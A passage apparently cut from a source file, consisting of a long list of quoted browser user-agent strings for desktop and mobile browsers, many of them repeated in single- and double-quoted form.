'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5',
'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20',
'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2',
'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2',
'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0',
'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0)',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1',
'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5',
'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20',
'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2',
'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2',
'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0',
'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
